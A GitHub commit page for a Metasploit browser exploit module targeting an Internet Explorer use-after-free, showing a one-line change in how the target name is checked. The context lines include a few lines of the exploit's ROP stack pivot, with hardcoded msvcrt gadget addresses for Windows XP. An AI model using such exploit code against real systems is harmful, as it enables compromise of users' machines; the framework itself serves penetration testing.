Skip to content

Commit 14f21c0

Browse files
author
jvazquez-r7
committed
using the rop as expected
1 parent eed5a74 commit 14f21c0

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -152,7 +152,7 @@ def get_payload(t, cli)
152152
case t['Rop']
153153
when :msvcrt
154154
print_status("Using msvcrt ROP")
155-
if t['Name'] =~ /Windows XP/
155+
if t.name =~ /Windows XP/
156156
stack_pivot = [0x77c15ed6].pack("V") * 54 # ret
157157
stack_pivot << [0x77c2362c].pack("V") # pop ebx, #ret
158158
stack_pivot << [0x77c15ed5].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c

0 commit comments

Comments
 (0)